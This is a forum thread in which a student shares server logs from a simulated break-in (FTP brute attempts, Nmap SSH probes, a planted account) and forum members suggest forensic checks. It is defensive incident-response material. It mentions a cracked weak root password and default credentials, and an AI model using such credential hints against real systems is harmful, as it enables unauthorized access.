    Apr 12 11:28:20 ServerGroep1 proftpd[2993] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:28:33 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:36:46 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'DBSNMP'
    Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER DBSNMP: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:36:55 ServerGroep1 proftpd[3061] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:36:56 ServerGroep1 proftpd[3061] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:37:21 ServerGroep1 proftpd[3067] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:22 ServerGroep1 proftpd[3067] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:37:23 ServerGroep1 proftpd[3071] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:42 ServerGroep1 proftpd[3071] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:37:42 ServerGroep1 proftpd[3077] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:42 ServerGroep1 proftpd[3077] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:37:46 ServerGroep1 proftpd[3079] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:46 ServerGroep1 proftpd[3079] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:37:48 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:49 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:37:49 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:38:03 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:38:04 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:38:04 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:38:12 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:38:15 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:38:15 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:38:19 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:38:23 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:38:37 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    
    Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): USER leo: Login successful.
    Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): Preparing to chroot to directory '/var/www/user/leo'
    Apr 12 12:41:55 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): using sendfile capability for transmitting data
    Apr 12 12:42:11 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): using sendfile capability for transmitting data
    Apr 12 12:43:56 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): FTP session closed.
    
    Several login attempts. Most of them failed, then suddenly they are successful.
    Notable entries:
    Evil.host 10.0.0.14
    Cc4u.lan 10.13.37.10

    Also:

    Attempt to attack?

    /var/log/proftpd/xverlog
    12 april 12.38.xx - 12.50.xx
    Cc4u.lan -> files have been transfered to folder leo

    Bash script has been planted? Or?

    /var/log/syslog
    Several portscans, blocked IP’s

    /var/log/wtmp
    http://ubuntuforums.org/archive/index.php/t-886287.html
    I will place the contents of this file tomorrow, but it contains several entries with several tty's (7, 9) and pts/0.

    Auth.log:
    Code:
     Apr 12 11:18:00 ServerGroep1 login[3087]: ROOT LOGIN  on 'tty1'
    Apr 12 11:20:10 ServerGroep1 sshd[3104]: Did not receive identification string from 10.0.0.14
    Apr 12 11:20:17 ServerGroep1 sshd[3106]: Protocol major versions differ for 10.0.0.14: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
    Apr 12 11:20:18 ServerGroep1 sshd[3109]: Protocol major versions differ for 10.0.0.14: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
    Apr 12 11:25:49 ServerGroep1 sshd[2183]: Server listening on :: port 22.
    Apr 12 11:25:49 ServerGroep1 sshd[2183]: Server listening on 0.0.0.0 port 22.
    Apr 12 11:25:55 ServerGroep1 sshd[2183]: Received signal 15; terminating.
    Apr 12 11:25:55 ServerGroep1 sshd[2982]: Server listening on :: port 22.
    Apr 12 11:25:55 ServerGroep1 sshd[2982]: Server listening on 0.0.0.0 port 22.
    Apr 12 11:28:21 ServerGroep1 sshd[2992]: Did not receive identification string from 10.13.37.10
    Apr 12 11:28:28 ServerGroep1 sshd[2996]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
    Apr 12 11:28:28 ServerGroep1 sshd[2998]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
    Apr 12 11:36:59 ServerGroep1 login[2925]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
    Apr 12 11:36:59 ServerGroep1 login[3062]: ROOT LOGIN  on 'tty1'
    Apr 12 11:37:49 ServerGroep1 sshd[3081]: Did not receive identification string from 10.13.37.10
    Apr 12 11:38:56 ServerGroep1 sshd[3092]: Did not receive identification string from 10.13.37.10
    Apr 12 11:39:01 ServerGroep1 CRON[3100]: pam_unix(cron:session): session opened for user root by (uid=0)
    Apr 12 11:39:01 ServerGroep1 CRON[3100]: pam_unix(cron:session): session closed for user root
    Apr 12 11:44:13 ServerGroep1 sshd[3139]: Did not receive identification string from 10.13.37.10
    Apr 12 11:44:21 ServerGroep1 sshd[3143]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
    Apr 12 11:44:21 ServerGroep1 sshd[3145]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
    Apr 12 11:57:24 ServerGroep1 sshd[3205]: Accepted password for root from 10.0.0.10 port 54049 ssh2
    ==============
    What we do think to know:
    - A user “cees” has been added to both the passwd and shadowfile
    - The account Leo has been used to gain FTP access
    - evil.host and cc4u.lan are malicious hosts.
    - The IP’s 10.0.0.14 and 10.13.37.10 are suspicious at least
    - There have been several attempts to find vulnerabilities in the website
    - A hacker framework has been used to find vulnerabilities
    - A bash script in Leo’s folder contains very suspicious information. For example: the touch command was used, to alter timestamps.
    - The suspicious activities start april 12 2010

    Questions remaining..
    - The exact number of hackers, is unknown.
    - The identity of the hackers is unknown.
    - Can we still trust our timestamps since we know the touch command has been used?
    - When was the first server access? And how did they gain access in the first place?

    Could you please advice on how to investigate this issue more thoroughly?
    Help is much appreciated.
     
    Last edited: May 24, 2011
  2. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,215
    I would recommend the following (disclaimer: I'm no web ninja :) ) :

    Not decide anything until you have actual proof; early conclusions can mislead.

    Useful stuff to check:

    Do you have /var/log/secure for ssh/sudo logins and connections?
    Do you have process account (pacct) enabled? If you do, you can read the log for every successfully executed command on the system. This can help you try to trace the activity some more.

    Have you tried disassembling the new touch command and the suspicious jpg file. At the very least, examine them with strings command to see if there are any useful strings in there. Can you also use file to see whether that job is indeed an image format, because extensions are meaningless.

    Did you check md5sum for important system utilities, like ps, top, lsof, netstat? Compare to a different system of same spec. If these are changed, you most certainly have a problem.

    Those are some pointers that could help you.

    Regards,
    Mrk
     
  3. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Thanks for your reply!

    I don not have a folder or file called secure in log.

    I do not know if it was. However, I cannot find /var/log/account/pacct nor any file called pacct.

    I don't know what you mean by the first. About the latter: the .jpg seems to be a normal .jpg, also when opened by notepad.

    No, but I will do that. I will go look for a Debian 5.0.4 installation and check those files. However, I do think this might be a bit out of our investigation leap.

    I will reply with the results.
    In the meantime: can you think of any more locations I can check? The most imporant questions we try to anwser at this time:
    - How did they gain access in the first place?
    - Can we proove the IP's 10.0.0.14 and 10.13.37.10 acutally have HACKED into our system? We know they have tried to attack the system. We also know they have gained access to the system. We do not know however if they gained access through hacking (or any other way, for example keylogging and then using someone else's account), nor do we know if they actually succesfully hacked the system at all.

    Thank you very much!
     
  4. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    I have found something suspicious, but I'm not sure how to interpret the data.

    The file /var/log/wtmp contains logins and logouts. It contains:

    Code:
     2.6.26-2-686
    tty3
    LOGIN
    tty4
    LOGIN
    tty2
    LOGIN
    tty1
    LOGIN
    tty5
    LOGIN
    tty6
    LOGIN
    tty1
    root
    tty1
    root
    ftpd3412
    cc4u.lan
    pts/0
    ts/0leo
    cc4u.lan
    ftpd3412
    cc4u.lan
    pts/0
    ftpd3534
    cc4u.lan
    pts/0
    ts/0leo
    cc4u.lan
    ftpd3534
    cc4u.lan
    pts/0
    pts/0
    ts/0administrator
    cc4u.lan
    pts/0
    tty1
    tty1
    2.6.26-2-686
    tty1
    LOGIN
    2.6.26-2-686
    pts/0
    ts/0administrator
    cc4u.lan
    pts/0
    pts/0
    ts/0administrator
    cc4u.lan
    pts/0
    2.6.26-2-686
    reboot
    
    What does this prove? I can see that there’s a ts/0leo (does this mean Leo accessed the server via TS?), and also “cc4u.lan”. Does this mean it’s the host that logged in, or a username?

    In the file "lastlog", we find this:
    Code:
    Ktty1
    Kpts/0
    cc4u.lan
    Kpts/0
    cc4u.lan
    
    I don’t know how to interpret this either.
     
  5. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    Hi i don't know Unix, but i noticed you mentioned the IP's 10.0.0.14 and 10.13.37.10

    I see similar IP's when i do ipconfig /all on my XP comp

    10.gif

    If that's normal, then i've got a REAL problem, unlike your assignment.

    So either it's normal for you to see them or ?
     
  6. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Hi,

    You don't need to worry. The A-class IP-range (10.x.x.x) is an internal range. It cannot be used on the internet.
    I'm not fully sure on why it's showing those as your WINS Servers, because I believe WINS is pretty outdated and replaced by DNS.

    It does depend a bit on your internal network structure. Their could (in theory) be a rogue WINS server on your network, but the changes of that are close to null I'd say.
     
  7. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,215
    Eagle,

    To check real file type: "file <filename>"

    To disassemble, you run: "objdump -S -D <file> > <output>".
    But then, without really knowing assembly, having symbols or sources, this could be tricky. Still, you might be able to find something useful in there.

    But BEFORE you do that: "strings <filename>".

    You cannot be sure those are real IPs. It is also possible that someone had root on a remote box and sudo-ed or su-ed to another user and another and so forth, so that's not a real indication of anything.

    Packets could have been mangled to appear to be coming from those sources. You might want to consult the switch/router that forwards communication to your web server. You might also want to use arp to see what mac addresses are in the neighborhood, and then cross reference those to ips and hostname referenced in dns, files, etc, if at all.

    How was the access gained? I can only guess.
    Weak password for user leo? Weak ftp permissions?
    Weak system permissions that allowed user to cd outside ftp directory into system and do changes of all kinds? A vulnerability in your web server that allow an attacker to gain shell?

    wtmp/utmp/lastlog are not reliable, even on fully healthy systems.
    Not all apps/utilities register there. TTY-less users won't show there.

    BTW, are you having fun with your assignment? :)

    Personally, I prefer productive code monkeying over security ... :)


    Regards,
    Mrk
     
  8. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Haha, sure it's fun.
    My education focuses on information security management, so hacking is a part of it and law (legal issues) too. We are going to simulate a lawsuit next week using the evidence found during the investigation

    We also found out using MD5 decrypting that user ‘root’ used ‘toor’ as his password, for both the public website and the shell. So we might be able to prove negligence (by ProvID) as well.

    Unfortunately we haven’t found much more information than we already had.

    It’s quite interesting for sure!

    Thank you very much for your information!
     
  9. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    Hi, thanks :thumb: i presumed they are internal IP's on both mine and yours. But as you were asking about the 10 range on yours, i wondered if you were concerned that something fishy was happening there, due to you posting about them ? Which made me wonder about my 10 range.

    I'm on XP/SP2, if that makes Any difference ?

    OK :thumb:
     
  10. mack_guy911

    mack_guy911 Registered Member

    Joined:
    Mar 21, 2007
    Posts:
    2,677
    sounds like your school teaches CEH (Certified Ethical Hacker) and CHFI (Certified Hacking Forensic Investigator)

    :D
     
  11. mack_guy911

    mack_guy911 Registered Member

    Joined:
    Mar 21, 2007
    Posts:
    2,677

    root and toor are backtrack 3 default dont know if they still use the same on backtrack 5
     
  12. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Well, any IP can be suspicious depending on the situation. First of all, 10.10.10.10.'s hostname was "cc4u". Cc4u is the same name used in the defaced website. Second, "10.13.37.10" is also used by cc4u. Not only that, but this IP contains "1337": hacker slang for 'elite'.

    No, although SP2 isn't supported anymore since 13-07-2010! You need to upgrade to SP3 to receive the latest security updates.

    It might, but it does not ;). We haven't hacked either. We learn about hacking techniques, perform some basic things (like path traversal, cross site scripting, sql injections, etc) but focus on investigating. We aren't taught to become investigators either ;).

    That might be the case, but I doubt it has any relevance :).
     
  13. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    @ Eagle Creek

    Thanks for the feedback :thumb:
     
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.